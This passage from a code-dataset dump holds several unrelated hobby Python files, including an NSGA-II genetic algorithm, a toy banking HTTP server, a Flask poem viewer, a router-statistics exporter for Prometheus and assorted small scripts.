enumerate(g.axes[0]):\n    ax.set(title=metrics[ax_i], ylabel=ylabels[ax_i], xticklabels=xticks, xticks=np.arange(4))\n\n# legends\ng.add_legend()\nhandles, labels = g.axes[-1][-1].get_legend_handles_labels()\ng.axes[-1][-1].legend(handles=handles[5:], labels=labels[5:], bbox_to_anchor=(1.9, 1.0))\n\n# save the figure\nplt.savefig(\"ultimate_intra={}_inter={}.pdf\".format(intra_mode, inter_mode), bbox_inches=\"tight\")\n\n\n\n# \"\"\"\n# training figures\n# \"\"\"\n# training = pd.read_csv(PATH + 'training_intra={}_inter={}.csv'.format(intra_mode, inter_mode), keep_default_na=False)\n# training = training.melt(id_vars=['module index', 'network type', 'intra type',\n#                                   'inter type', 'intra params', 'inter params'], var_name='metric')\n# print(training)\n#\n# sns.set(font_scale=2)\n# g = sns.catplot(x=\"module index\", y=\"value\", hue='intra params', data=training,\n#                 kind='bar', row=\"metric\", col='network type', sharey='row', margin_titles=True,\n#                 ci='sd', alpha=0.7)\n# for ax in g.axes[0]:\n#     ax.axhline(y=0.1, color='black', linewidth=2.0)\n\n#\n# plt.savefig(\"training_intra={}_inter={}.pdf\".format(intra_mode, inter_mode), bbox_inches=\"tight\")\n","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"9830936","text":"from my_utils import *\nimport numpy as np\nfrom datetime import datetime\n\ndef NSGA(dimension):\n    c,w = gen_model(dimension)\n\n    # pick one parent from the population by binary tournament (prefer larger objective values)\n    def BinaryTournament(P):\n        size = P.shape[0]\n        t1 = P[np.random.randint(size)]\n        t2 = P[np.random.randint(size)]\n        minus = target_function(c,w,t1) - target_function(c,w,t2)\n        return t1 if np.sum(minus) > 0 else t2\n\n    # return the solution sets sorted by non-domination rank (better fronts first)\n    def fastNonDominatedSorting(P):\n        rank = np.zeros(P.shape[0])\n\n        S = [[] for i in range(P.shape[0])]\n        n = np.zeros(P.shape[0])\n        F = []\n        for x in range(P.shape[0]):\n            for y in range(P.shape[0]):\n                if dominatedBy(c,w,P[y],P[x]):\n                    S[x].append(y)\n                elif dominatedBy(c,w,P[x],P[y]):\n                    n[x] += 1\n            if n[x] == 0:\n                rank[x] = 1\n                F.append(x)\n\n        i = 0\n        while len(F)>0:\n            Q = []\n            for x in F:\n                for y in S[x]:\n                    n[y] -= 1\n                    if n[y] == 0:\n                        rank[y] = i+1\n                        Q.append(y)\n            i += 1\n            F = Q\n\n        ret = []\n        for i in range(1,P.shape[0]+1):\n            tmp = []\n            for j in range(len(rank)):\n                if rank[j] == i:\n                    tmp.append(P[j])\n            if len(tmp)>0:\n                ret.append(tmp)\n            else:\n                break\n\n        # reverse so the better fronts come first\n        return ret[::-1]\n\n    # compute the crowding-distance scores, returns an ndarray\n    def crowdingDistance(P):\n        target = [target_function(c,w,p) for p in P]\n        target = np.array(target).T # after transposing the shape is: objective dims x individuals\n        # initialise all distances to 0\n        distance = np.zeros([len(P)])\n        for dim in range(target.shape[0]):\n            Q = target[dim,:]\n            Q = np.sort(Q)\n            scale = Q.max() - Q.min()\n            for i in range(len(P)):\n                index = int(np.where(Q == target[dim][i])[0][0])\n                if index==0 or index==target.shape[1]-1:\n                    distance[i] = 100000 # treat boundary points as infinitely spaced\n                else:\n                    distance[i] += (Q[index+1] - Q[index-1]) / scale\n        return distance\n\n\n    # main loop starts here\n    p = init_population()\n    for epoch in range(Epoch):\n        print(datetime.now().strftime('20%y-%m-%d %H:%M:%S'),\" NSGA-II on\",str(dimension)+'d',\" Epoch:\",epoch)\n        # select parents and generate offspring\n        offspring = []\n        while len(offspring) < PopulationSize:\n            p1 = BinaryTournament(p)\n            p2 = BinaryTournament(p)\n\n            p1 = mutation(p1)\n            p2 = mutation(p2)\n\n            child = crossover(p1,p2)\n            offspring.append(child)\n\n        new_pop = np.array(list(p)[:] + offspring[:])\n\n        # N+N selection\n        pops = fastNonDominatedSorting(new_pop)\n        p = [] # reset the population\n        for tmp in pops: # tmp is a list of individuals in one front\n            if len(p) == PopulationSize:\n                break\n            elif len(p) + len(tmp) <= PopulationSize:\n                p += tmp\n            else:\n                dis = crowdingDistance(tmp)\n                k = PopulationSize-len(p)\n                ids = np.argpartition(dis,-k)\n                for index in ids[-k:]:\n                    p.append(tmp[index])\n\n        p = np.array(p)\n\n    print('NSGA-II Success!')\n    ret = [gen_result(individual) for individual in p]\n\n    print(\"Final Population Size:\",end=' ')\n    for i in range(len(ret)):\n        print(len(ret[i]),end=' ')\n    print()\n\n    return ret","sub_path":"启发式搜索与演化算法/hw4/my_NSGA_II.py","file_name":"my_NSGA_II.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"316455407","text":"\"\"\"\nModule for asynchronously saving files and computing data\n\"\"\"\nimport os\nimport asyncio\nimport sys\n\n__author__ = \"Przemek\"\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nprint(BASE_DIR)\nFILES_DIR = os.path.dirname(os.path.join(BASE_DIR, 'async', ''))\n\n\ndef create_directory(directory):\n    \"\"\"Create directory for files, if it does not exist\"\"\"\n    if not os.path.exists(directory):\n        os.makedirs(directory)\n    return os.path.dirname(os.path.abspath(directory)) + '\\\{}'.format(directory)\n\nasync def compute_values(x, y, z):\n    return (x * y) / z\n\n\nasync def save_values(x, y, z, path, name):\n    while True:\n        # keep the awaited result and write it out as text\n        result = await compute_values(x, y, z)\n        with open(path + '\\\{}.txt'.format(name), mode='w+') as file:\n            file.write(str(result))\n\n\ndef got_result(future):\n    print(future.result())\n\n\nfiles_dir = create_directory('filess')\n# main event loop\nloop = asyncio.get_event_loop()\n\n# Create a task from coroutine\ntask = loop.create_task(save_values(2, 4, 6, files_dir, 'log'))\n\n# Please notify when task is completed\ntask.add_done_callback(got_result)\n\n# The loop will run forever\nloop.run_until_complete(task)\n","sub_path":"async/[ASYNC] 
calculate_data_save_to_file.py","file_name":"[ASYNC] calculate_data_save_to_file.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"401228397","text":"# from django.urls import path\n# from . import views\n\n\n# urlpatterns = [\n# path('location/', views.get_post_locations.as_view(), name=\"location-all\")\n# ]\nfrom django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n url(r'^location/(?P<pk>[0-9]+)$', # urls with details i.e /movies/(1-9)\n views.get_delete_update_location,\n name='get_delete_update_location'\n ), \n url(\n r'^locations/$', # urls list all and create new one\n views.get_post_locations,\n name='get_post_locations'\n ), \n url(\n r'^viewer', # urls list all and create new one\n views.index,\n name='index'\n ),\n # url(\n # r'^static', # urls list all and create new one\n # views.static,\n # name='static'\n # ), \n]","sub_path":"lotrlocations/locations/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"47931136","text":"import csv\nimport io\nimport json\nimport os.path\nimport shutil\n\nfrom http import HTTPStatus\nfrom http.server import ThreadingHTTPServer, BaseHTTPRequestHandler\n\n__version__ = \"0.0\"\n\n\nclass AbcHTTPRequestHandler(BaseHTTPRequestHandler):\n server_version = \"AbcHTTP/\" + __version__\n protocol_version = \"HTTP/1.1\"\n\n pages_path = \"www\"\n main_page_path = os.path.join(pages_path, \"MainPage.html\")\n\n user_accounts_page_path = os.path.join(pages_path, \"UserAccountsPage.html\")\n user_accounts_page_above_rows = None\n user_account_row_template = None\n user_accounts_page_below_rows = None\n\n user_accounts_action_result_page_path = os.path.join(pages_path, \"UserAccountsActionResult.html\")\n user_accounts_action_result_page = None\n\n request_user_login = \"/user/?login=\"\n\n # noinspection PyPep8Naming\n def do_HEAD(self):\n self.send_response(HTTPStatus.NOT_IMPLEMENTED)\n\n # noinspection PyPep8Naming\n def do_GET(self):\n request = self.path\n print(request)\n # Main page\n if request == \"/\":\n self.send_main_page()\n # User sign in\n elif request.startswith(self.request_user_login):\n self.send_user_accounts(request[len(self.request_user_login):])\n # 404\n else:\n self.send_error(HTTPStatus.NOT_FOUND)\n\n # noinspection PyPep8Naming\n def do_POST(self):\n request = self.path\n print(request)\n # read request body\n content_length = 0\n h = self.headers\n for item in h.items():\n if item[0].lower() == \"content-length\":\n content_length = int(item[1])\n break\n if content_length != 0:\n request_body = self.rfile.read(content_length).decode('utf-8')\n else:\n self.send_error(HTTPStatus.BAD_REQUEST)\n return\n print(request_body)\n\n # request_body: param=value¶m=value&parm=value\n param_dict = {}\n for param in request_body.split('&'):\n key_and_value = param.split('=')\n param_dict[key_and_value[0]] = key_and_value[1]\n \n # action with account\n if request == \"/user/accounts/action\":\n # request_body: login=user1&account-number=001&amount=100&account-action=deposit\n dbh = UserDatabaseHandler(param_dict[\"login\"])\n result_of_request_to_db = dbh.action_on_account(param_dict)\n # create new account\n elif request == \"/user/accounts/create\":\n # request_body: login=user1¤cy=RUB\n dbh = UserDatabaseHandler(param_dict[\"login\"])\n result_of_request_to_db = dbh.create_new_account(param_dict)\n 
# 404\n        else:\n            self.send_error(HTTPStatus.NOT_FOUND)\n            return\n\n        # send result\n        self.send_user_accounts_action_result_page(param_dict['login'], result_of_request_to_db)\n\n    def send_main_page(self):\n        with open(self.main_page_path, 'rb') as main_page:\n            self.send_response(HTTPStatus.OK)\n            self.send_header(\"Content-Type\", \"text/html; charset=UTF-8\")\n            self.send_header(\"Content-Length\", str(os.fstat(main_page.fileno())[6]))\n            self.end_headers()\n            shutil.copyfileobj(main_page, self.wfile)\n\n    def __init_user_accounts_template__(self):\n        with open(self.user_accounts_page_path, 'r') as f:\n            start_mark = \"{begin account-row-template}\"\n            end_mark = \"{end account-row-template}\"\n            page_template = f.read()\n            self.user_accounts_page_above_rows = page_template[:page_template.find(start_mark)]\n            self.user_account_row_template = \\\n                page_template[page_template.find(start_mark) + len(start_mark):page_template.find(end_mark)]\n            self.user_accounts_page_below_rows = page_template[page_template.find(end_mark) + len(end_mark):]\n\n    def send_user_accounts(self, username):\n        dbh = UserDatabaseHandler(username)\n        user_accounts = dbh.get_user_accounts('r')\n        if user_accounts is None:\n            dbh.create_new_user()\n            # re-open the freshly created (empty) accounts file so json.load below gets a real file object\n            user_accounts = dbh.get_user_accounts('r')\n\n        if self.user_accounts_page_above_rows is None:\n            self.__init_user_accounts_template__()\n\n        accounts_rows = \"\"\n        accounts_dict = json.load(user_accounts)\n        user_accounts.close()\n        for account_number in accounts_dict:\n            a_row = self.user_account_row_template.\\\n                replace(\"{number}\", account_number).\\\n                replace(\"{currency}\", accounts_dict[account_number][\"currency\"]).\\\n                replace(\"{amount}\", str(accounts_dict[account_number][\"amount\"])).\\\n                replace(\"{username}\", username)\n            accounts_rows += a_row + '\\n'\n\n        response_body = \\\n            self.user_accounts_page_above_rows.replace(\"{username}\", username) \\\n            + accounts_rows \\\n            + self.user_accounts_page_below_rows\n        response_body = response_body.encode('utf-8')\n        response_body_stream = io.BytesIO()\n        response_body_stream.write(response_body)\n        response_body_stream.seek(0)\n\n        self.send_response(HTTPStatus.OK)\n        self.send_header(\"Content-Type\", \"text/html; charset=UTF-8\")\n        self.send_header(\"Content-Length\", str(len(response_body)))\n        self.end_headers()\n        shutil.copyfileobj(response_body_stream, self.wfile)\n\n    def send_user_accounts_action_result_page(self, username, result_of_request_to_db):\n        if self.user_accounts_action_result_page is None:\n            with open(self.user_accounts_action_result_page_path, 'r') as file:\n                self.user_accounts_action_result_page = file.read()\n\n        response_body = self.user_accounts_action_result_page.\\\n            replace(\"{username}\", username).\\\n            replace(\"{result}\", result_of_request_to_db[1])\n        response_body = response_body.encode('utf-8')\n        response_body_stream = io.BytesIO()\n        response_body_stream.write(response_body)\n        response_body_stream.seek(0)\n\n        self.send_response(HTTPStatus.OK)\n        self.send_header(\"Content-Type\", \"text/html; charset=UTF-8\")\n        self.send_header(\"Content-Length\", str(len(response_body)))\n        self.end_headers()\n        shutil.copyfileobj(response_body_stream, self.wfile)\n\n\n
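# A minimal illustrative sketch (not part of abc_server.py itself) of the form-body
# parsing that do_POST above does by hand with split('&')/split('='); the standard
# library's parse_qs also handles percent-encoded values. The helper name is illustrative.
from urllib.parse import parse_qs

def parse_form_body(request_body):
    # parse_qs returns {key: [values]}; keep the first value per key
    return {k: v[0] for k, v in parse_qs(request_body).items()}

assert parse_form_body("login=user1&currency=RUB") == {"login": "user1", "currency": "RUB"}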
# TODO:\n# py file for class\n# request result constants outside the class\nclass UserDatabaseHandler:\n    database_path = \"database\"\n    index = os.path.join(database_path, \"database.index\")\n\n    REQUEST_RESULT_OK = (0, \"Success\")\n    REQUEST_RESULT_ERROR_WRONG_REQUEST_OR_DATABASE_ERROR = (100, \"Wrong request or internal database error\")\n    REQUEST_RESULT_ERROR_WRONG_REQUEST = (200, \"Wrong request\")\n    REQUEST_RESULT_ERROR_WRONG_REQUEST_INSUFFICIENT_FUNDS = (201, \"Insufficient funds\")\n    REQUEST_RESULT_ERROR_WRONG_REQUEST_UNSUPPORTED_ACTION = (202, \"Unsupported action\")\n    REQUEST_RESULT_ERROR_DATABASE_ERROR = (300, \"Internal database error\")\n\n    def __init__(self, username):\n        self.username = username\n\n    def create_new_user(self):\n        user_accounts_path = self.username + \".acc\"\n        user_index = [self.username, user_accounts_path]\n        with open(self.index, 'a') as index_file:\n            csv.writer(index_file).writerow(user_index)\n        with open(os.path.join(self.database_path, user_accounts_path), 'w') as account_file:\n            empty_dict = {}\n            json.dump(empty_dict, account_file)\n\n    def get_user_accounts_path(self):\n        \"\"\"\n        Search the database index file for the path to the user accounts info file.\n        Return the path or an empty string.\n        :return: path or empty string\n        \"\"\"\n        file_path = \"\"\n        with open(self.index, 'r') as index_file:\n            for row in csv.reader(index_file):\n                if row[0] == self.username:\n                    file_path = os.path.join(self.database_path, row[1])\n                    break\n        if os.path.isfile(file_path):\n            return file_path\n        else:\n            return \"\"\n\n    def get_user_accounts(self, mode):\n        \"\"\"\n        Open the file at self.get_user_accounts_path() and return the corresponding file object.\n        If get_user_accounts_path() returns an empty string, this function returns None.\n        :param mode: have the same meaning as in built-in function open()\n        :return: file object or None\n        \"\"\"\n        file_path = self.get_user_accounts_path()\n        if file_path != \"\":\n            return open(file_path, mode)\n        else:\n            return None\n\n    def create_new_account(self, param_dict):\n        \"\"\"\n        Create new account with currency param_dict['currency']\n        :param param_dict: dictionary {'login': str, 'currency': str}\n        :return: REQUEST_RESULT_* constant\n        \"\"\"\n        if 'currency' not in param_dict:\n            return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST\n        currency = param_dict['currency']\n\n        accounts_file_path = self.get_user_accounts_path()\n        if accounts_file_path == \"\":\n            return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST_OR_DATABASE_ERROR\n        with open(accounts_file_path, 'r') as file:\n            accounts = json.load(file)\n\n        acc_number_lst = []\n        for acc in accounts:\n            acc_number_lst.append(int(acc))\n        acc_number_lst.sort()\n\n        if len(acc_number_lst) != 0:\n            new_account_number = acc_number_lst[-1] + 1\n            if new_account_number > 999:\n                return UserDatabaseHandler.REQUEST_RESULT_ERROR_DATABASE_ERROR\n        else:\n            new_account_number = 1\n\n        accounts[str(new_account_number).rjust(3, '0')] = {'currency': currency, 'amount': 0.0}\n        with open(accounts_file_path, 'w') as file:\n            json.dump(accounts, file)\n        return UserDatabaseHandler.REQUEST_RESULT_OK\n\n    def action_on_account(self, param_dict):\n        \"\"\"\n        Perform action param_dict['account-action'] (deposit/withdraw) on account\n        whose number is param_dict['account-number'] and which belongs to the user param_dict['login']\n        :param param_dict: dictionary {'login': str, 'account-number': str, 'amount': str, 'account-action': str}\n        :return: REQUEST_RESULT_* constant\n        \"\"\"\n        if 'account-number' not in param_dict:\n            return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST\n        if 'account-action' not in param_dict:\n            return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST\n        if 'amount' not in param_dict:\n            return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST\n\n        number = param_dict['account-number']\n        action = param_dict['account-action']\n        amount_for_action = round(float(param_dict['amount']), 2)\n\n        accounts_file_path = self.get_user_accounts_path()\n        if accounts_file_path == \"\":\n            return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST_OR_DATABASE_ERROR\n        with open(accounts_file_path, 'r') as file:\n            accounts = json.load(file)\n\n        if number not in accounts:\n            return UserDatabaseHandler.REQUEST_RESULT_ERROR_DATABASE_ERROR\n        acc = accounts[number]\n        if 'amount' not in acc:\n            return UserDatabaseHandler.REQUEST_RESULT_ERROR_DATABASE_ERROR\n        amount_in_account = acc['amount']\n\n        if action == 'deposit':\n            amount_in_account += amount_for_action\n        elif action == 'withdraw':\n            if amount_in_account >= amount_for_action:\n                amount_in_account -= amount_for_action\n            else:\n                return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST_INSUFFICIENT_FUNDS\n        else:\n            return UserDatabaseHandler.REQUEST_RESULT_ERROR_WRONG_REQUEST_UNSUPPORTED_ACTION\n\n        with open(accounts_file_path, 'w') as file:\n            acc['amount'] = round(amount_in_account, 2)\n            json.dump(accounts, file)\n        return UserDatabaseHandler.REQUEST_RESULT_OK\n\n\ndef run(server_class=ThreadingHTTPServer, handler_class=AbcHTTPRequestHandler):\n    server_address = ('localhost', 8080)\n    httpd = server_class(server_address, handler_class)\n    print(\"Python system version:\", handler_class.sys_version)\n    print(\"Server version:\", handler_class.server_version)\n    httpd.serve_forever()\n\n\nif __name__ == \"__main__\":\n    run()\n","sub_path":"abc_server.py","file_name":"abc_server.py","file_ext":"py","file_size_in_byte":12337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"264989943","text":"class ResultSaved():\n\tdef __init__(self):\n\t\tself.Name \t\t=''\n\t\tself.amount_Column\t=1\n\tdef Saved(self):\n\t\tcode=open('main.f08','a')\n\t\tcode.write(\"\topen(30,file='\"+self.Name+\".csv')\\n\")\n\t\tcode.write(\"\t\twrite(30,*)' NO3 NO2 NO N2O N2 S2 Sul SO4 X_Mox X_Mred X_VSS'\\n\")\n\t\tcode.write('\t\twrite(30,\"('+str(self.amount_Column)+'f20.10)\")'+self.Name+'\\n')\n\t\tcode.write('\tclose(30)\\n\\n')\n\t\tcode.close()","sub_path":"sludge/tests/ResultSave_old.py","file_name":"ResultSave_old.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"219274057","text":"from flask import Flask, render_template\nimport requests\nimport random\n\napp = Flask(__name__)\napp.debug = True\n\ndef get_data():\n\turl = \"https://raw.githubusercontent.com/ischurov/dj-prog/master/pushkin1.json\"\n\tr = requests.get(url)\n\treturn r.json()\n\ndef get_poems_list(json):\n    poems = json['poems']\n    poems_list = []\n    for i in range(len(poems)):\n        title = poems[i]['title'][0]\n        if title == \"* * *\":\n            title = poems[i]['verses'][0]\n        year = poems[i]['year']\n        if title[-1] == \",\":\n            title = title.replace(\",\", \"\")\n        if not title.isupper():\n            title = title.upper()\n        title = title.strip()\n        string = \"{0}, {1}\".format(title, year)\n        poems_list.append(string)\n    return poems_list\n\n\n@app.route('/')\ndef poems_list():\n\treturn render_template(\"poems_list.html\", data = get_poems_list(get_data()))\n\n@app.route('/poem/<int:n>')\ndef show_poem(n):\n    raw_data = get_data()\n    data = raw_data['poems']\n    poem = data[n - 1]\n    return render_template(\"poem.html\", div = poem, n = n)\n\n@app.route('/random')\ndef show_random():\n    rand_number = random.randrange(0, 231, 1)\n    raw_data = get_data()\n    data = raw_data['poems']\n    rand_poem = data[rand_number]\n    return render_template(\"random.html\", div = rand_poem)\n\n\nif __name__ == '__main__':\n    app.run()\n","sub_path":"pushkin.py","file_name":"pushkin.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
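# A hedged aside on pushkin.py above: /random hard-codes the corpus size in
# random.randrange(0, 231, 1). random.choice over the loaded list is size-agnostic;
# a minimal sketch follows (helper name illustrative, not part of the file).
import random

def pick_random_poem(poems):
    # equivalent to poems[random.randrange(len(poems))]
    return random.choice(poems)

assert pick_random_poem([{"title": "x"}]) == {"title": "x"}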
+{"seq_id":"442583806","text":"def classifica_lista(lista):\n    if len(lista)<2:\n        return 'nenhum'\n    w = lista[1]-lista[0]\n    if w>0:\n        for i in range (len(lista)-1):\n            if lista[i]-lista[i+1]<=0:\n                return 'nenhum'\n    if w<0:\n        for i in range (len(lista)-1):\n            if lista[i]-lista[i+1]>=0:\n                return 'nenhum'\n    if w==0:\n        return 'nenhum'\n    elif w>0:\n        return 'crescente'\n    elif w<0:\n        return 'decrescente'","sub_path":"backup/user_022/ch151_2020_04_13_19_40_39_601011.py","file_name":"ch151_2020_04_13_19_40_39_601011.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"651882968","text":"#!/usr/bin/env python3\r\n\"\"\"Continuous bayesian inference\"\"\"\r\n\r\n\r\nfrom scipy import math, special\r\n\r\n\r\ndef posterior(x, n, p1, p2):\r\n    \"\"\"Continuous bayesian inference\"\"\"\r\n    if type(n) is not int or n <= 0:\r\n        raise ValueError(\"n must be a positive integer\")\r\n    if type(x) is not int or x < 0:\r\n        raise ValueError(\"x must be a positive integer\")\r\n    if x > n:\r\n        raise ValueError(\"x cannot be greater than n\")\r\n    if type(p1) is not float or p1 < 0 or p1 > 1:\r\n        raise ValueError(\"p1 must be a float in the range [0, 1]\")\r\n    if type(p2) is not float or p2 < 0 or p2 > 1:\r\n        raise ValueError(\"p2 must be a float in the range [0, 1]\")\r\n    if p2 <= p1:\r\n        raise ValueError(\"p2 must be greater than p1\")\r\n    return None\r\n","sub_path":"math/0x07-bayesian_prob/100-continuous.py","file_name":"100-continuous.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
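# A hedged completion sketch for posterior() in 100-continuous.py above, which
# validates its arguments but returns None. With a uniform prior, p | (x, n) is
# Beta(x + 1, n - x + 1), so P(p1 <= p <= p2) is a difference of Beta CDFs
# (scipy.special.betainc is the regularized incomplete beta, i.e. the Beta CDF).
# This is an illustration, not the project's reference implementation.
from scipy import special

def posterior_interval(x, n, p1, p2):
    a, b = x + 1, n - x + 1
    return special.betainc(a, b, p2) - special.betainc(a, b, p1)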
+{"seq_id":"469658970","text":"# export the 500-hour Cantonese (粤语) speech dataset\n# author:zhaowenhua, date:2019-10-09\n\nimport os\nimport subprocess\nimport shutil\nfrom collections import defaultdict\n\n\ndef mkdir_if_not_exists(filepath):\n    if not os.path.exists(filepath):\n        os.makedirs(filepath)\n\n\ndef check(src):\n    # check that wav and TextGrid files appear in pairs\n    names = defaultdict(list)\n    for path, dirs, filenames in os.walk(src):\n        for filename in filenames:\n            name, _ = os.path.splitext(os.path.join(path, filename))\n            names[name].append(filename)\n    errors = []\n    for name, contents in names.items():\n        if len(contents) != 2:\n            errors.append(name)\n\n    if len(errors) > 0:\n        print(errors)\n        raise NameError\n\n\ndef rename(src, dst):\n    # rename files for the client\n    for path, dirs, filenames in os.walk(src):\n        for filename in filenames:\n            if not filename.endswith('.TextGrid'):\n                continue\n            dirname = os.path.basename(path)\n            new_name = dirname + '_' + filename\n            src_path = os.path.join(path, filename)\n            if not filename.startswith('0'):\n                dst_path = os.path.join(dst, os.path.relpath(path, src), new_name)\n            else:\n                dst_path = os.path.join(dst, os.path.relpath(path, src), filename)\n            mkdir_if_not_exists(os.path.dirname(dst_path))\n            # convert the format\n            # transform(src_path, dst_path)\n            shutil.copy(src_path, dst_path)\n\n\n\ndef transform(src, dst):\n    cmd_line = u'bin/ffmpeg.exe -i \"{src}\" -ar 16k -ac 1 -y \"{dst}\"'.format(src=src, dst=dst)\n    try:\n        subprocess.check_call(cmd_line, shell=False, stderr=open(os.devnull, 'w'))\n    except Exception as e:\n        print(e)\n\n\nif __name__ == '__main__':\n    src = r'C:\\\Users\\\Aorus\\\Desktop\\\500小时粤语自然对话生成textgrid\\\第一次交付'\n    dst = r'\\\\\\\10.10.8.123\\\500小时粤语自然对话语音采集\\\交付数据\\\1011\\\500人粤语返工\\\500人粤语返工\\\返工交付第一批'\n    check(dst)\n    # rename(src, dst)","sub_path":"yueyuexport.py","file_name":"yueyuexport.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"546317205","text":"import asyncio\nimport requests\nimport json\n\n\ndef construct_data_for_prometheus(data):\n    def construct_for_field(field, type, help, value):\n        if field in data:\n            return f\"# TYPE {field} {type}\\n# HELP {field} {help}\\n{field} {value}\\n\"\n        return \"\"\n\n    s = \"\"\n    s += construct_for_field(\n        \"manual_memory_avail_bytes\",\n        \"gauge\",\n        \"RAM bytes available.\",\n        data[\"manual_memory_avail_bytes\"],\n    )\n    s += construct_for_field(\n        \"manual_uptime\",\n        \"gauge\",\n        \"System uptime.\",\n        data[\"manual_uptime\"],\n    )\n    return s\n\n\ndef json_from_everything(everything):\n    s = everything.decode().replace(\"'\", '\"')\n    s = s.replace(\"\\t\", \"\")\n    s = s.replace(\"\\n\", \"\")\n    s = s.replace(\",}\", \"}\")\n    s = s.replace(\",]\", \"]\")\n    return json.loads(s)\n\n\ndef http_importer(ip):\n    # Netis n4 (https://4pda.to/forum/index.php?showtopic=1031030&st=40)\n    # RAM: 64Mb\n    resp = requests.get(\n        f\"http://{ip}/cgi-bin/skk_get.cgi\",\n        auth=requests.auth.HTTPDigestAuth(\"guest\", \"!watr00shka4ever\"),\n    )\n    j = json_from_everything(resp.content)\n    return {\n        \"manual_memory_avail_bytes\": 64\n        * 1024\n        * 1024\n        * (100 - int(j[\"mem\"][:-1]))\n        / 100,\n        \"manual_uptime\": j[\"system_uptime\"],\n    }\n\n\nasync def minutely():\n    while True:\n        d = construct_data_for_prometheus(http_importer(\"192.168.1.254\"))\n        url = \"http://192.168.1.19/pushgateway/metrics/job/manual/instance/netis-n4\"\n        try:\n            r = requests.post(url, data=d)\n            # print inside the try block: r is unbound if the request raised\n            print(r.status_code, r.text)\n        except:\n            pass\n        await asyncio.sleep(60)\n\n\ndef stop():\n    task.cancel()\n\n\nloop = asyncio.get_event_loop()\ntask = loop.create_task(minutely())\n\ntry:\n    loop.run_until_complete(task)\nexcept asyncio.CancelledError:\n    pass\n","sub_path":"termux/stat_importer.py","file_name":"stat_importer.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"51880159","text":"from statistics.statistic import Statistic\nfrom statistics.statisticrepository import StatisticRepository\n\nfrom utils import arrayToJson\n\nclass StatisticController():\n    def __init__(self, connection):\n\n        self.connection = connection\n        self.repo = StatisticRepository(connection)\n\n    def getInfoByCourseId(self, courseID):\n        p = self.repo.findByCourseId(courseID)\n\n        return arrayToJson(p,\"statistics\")\n\n    def update(self,variabile_conditie,valori_conditie,variabile_put,valori_put):\n\n        if \"courseID\" in variabile_put:\n            return b'{\"code\":\"405\",\"result\":{\"error\":\"Interdictie modificare date\"}}'\n\n        result = self.repo.update(variabile_conditie,valori_conditie,variabile_put,valori_put)\n\n        if result == -1:\n            return b'{\"code\":\"404\",\"result\":{\"error\":\"Statistica inexistenta\"}}'\n        else:\n            return b'{\"code\":\"200\",\"result\":{\"error\":\"none\"}}'","sub_path":"server/statistics/statisticcontroller.py","file_name":"statisticcontroller.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
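# A hedged aside on stat_importer.py above: json_from_everything() rewrites a
# Python-repr-like payload into JSON by swapping quote characters, which corrupts
# any value containing an apostrophe. If the payload is a Python literal,
# ast.literal_eval parses it directly. Sketch only; the function name is illustrative.
import ast

def dict_from_python_literal(payload: bytes) -> dict:
    # literal_eval natively accepts single quotes and trailing commas
    return ast.literal_eval(payload.decode())

assert dict_from_python_literal(b"{'mem': '42%', 'system_uptime': 123,}") == {"mem": "42%", "system_uptime": 123}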
+{"seq_id":"292945026","text":"# pylint: disable=missing-docstring, global-statement, invalid-name\n#\n# Copyright (C) 2017 Jonas Colmsjö, Claes Strannegård\n#\n\n\n# Imports\n# ======\n\nimport unittest\n\nfrom sea import Sea\nfrom agents import Agent\nfrom agents import Obstacle\nfrom myutils import Logging\n\n\n# Setup logging\n# =============\n\nDEBUG_MODE = True\nl = Logging('test_cachalot', DEBUG_MODE)\n\n\n# Unit tests\n# ==========\n\nlane = ('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\\n' +\n        'wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww\\n' +\n        'wwwwwsssswwwwwwwwwwwwwwwwwwwwwwwwwwsssswwwwwwwwwww\\n')\n\n# the mother and calf have separate and identical lanes\nworld = lane + lane + 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'\n\noptions = {\n    'world': [x for x in world.split(\"\\n\")]\n}\n\nclass TestCachalot(unittest.TestCase):\n\n    def setUp(self):\n        l.info('Testing cachalot...')\n\n    def test_add_squid(self):\n        l.info('test_add_squid')\n\n        sea = Sea(options)\n\n        # squid cells sit 